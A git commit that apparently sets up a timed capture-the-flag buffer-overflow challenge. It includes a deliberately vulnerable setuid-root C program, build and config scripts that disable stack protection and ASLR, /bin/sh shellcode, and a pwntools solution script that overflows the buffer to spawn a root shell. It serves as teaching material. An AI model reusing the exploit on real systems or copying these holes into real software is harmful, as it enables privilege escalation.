buffer overflow

ee8fa98c · ben · ee8fa98c · ee8fa98c · ee8fa98c · ee8fa98c
Commit ee8fa98c authored 5 years ago by ben
--- a/simple_buffer_overflow/challenge
+++ b/simple_buffer_overflow/challenge
--- a/simple_buffer_overflow/compile.sh
+++ b/simple_buffer_overflow/compile.sh
+gcc source.c -m32 -o challenge -fno-stack-protector -z execstack
+sudo chown root:root challenge
+sudo chmod +xrs challenge
--- a/simple_buffer_overflow/config.sh
+++ b/simple_buffer_overflow/config.sh
+#!/bin/bash
+echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
+echo "kernel.randomize_va_space = 0"  > /etc/sysctl.d/01-disable-aslr.conf
+sudo apt-get install gcc-multilib python3 python3-pip python3-dev curl espeak -y 
+sudo pip3 install --upgrade git+https://github.com/arthaud/python3-pwntools.git
+sudo pip3 install termdown
+bash compile.sh
+sudo chown root:root defuse
+sudo chmod 700 defuse
--- a/simple_buffer_overflow/countdown.sh
+++ b/simple_buffer_overflow/countdown.sh
+/usr/bin/konsole --hide-menubar --fullscreen --hide-tabbar --noclose --nofork --profile countdown -e "termdown -v en-us -b '5m 30s'" &
+sleep 1
+/usr/bin/konsole --hide-menubar --fullscreen --noclose --nofork  --profile transparent &
--- a/simple_buffer_overflow/defuse
+++ b/simple_buffer_overflow/defuse
+#!/bin/bash
+kill -9 $(ps -ef | grep "[t]ermdown" | awk ' {print $2 } ')
--- a/simple_buffer_overflow/shellcode
+++ b/simple_buffer_overflow/shellcode
+jhh///sh/binh41QjYQ1jX̀
\ No newline at end of file
--- a/simple_buffer_overflow/shellcode.ascii
+++ b/simple_buffer_overflow/shellcode.ascii
+'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
--- a/simple_buffer_overflow/solution.py
+++ b/simple_buffer_overflow/solution.py
+from pwn import *
+
+shellcode = asm(shellcraft.i386.linux.sh())
+
+p = process("./challenge")
+
+output = p.recv(1024).decode("utf-8")
+
+print("Got output:\n",output)
+addr = output.split("Can you win my game?\n")[1].split("\n")[0]
+addr = p32(int(addr[2:],16))
+
+print("Address is:", str(addr))
+
+payload = b"".join([ b"\x90" * (50 - len(shellcode)), shellcode, 62 * b"\x90", addr])
+
+print("Payload: " , str(payload))
+
+p.sendline(payload)
+
+p.interactive()
--- a/simple_buffer_overflow/source.c
+++ b/simple_buffer_overflow/source.c
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+void play_the_game(int argc, char * argv[]) 
+{
+	char buffer[100];
+	printf("Can you win my game?\n%p\n", buffer);
+	if (argc != 2) 
+	{
+		fgets(buffer,150,stdin);
+	}
+	else
+	{
+		strcpy(buffer, argv[1]);
+	}
+	printf("Oh hi.\n %s\n",buffer);
+}
+
+
+int main(int argc, char * argv[]) 
+{
+	if (setuid(0))
+	{
+        	perror("setuid");
+        	return 1;
+	}
+	play_the_game(argc, argv);
+	printf("Try harder.\n");
+	return 0;
+}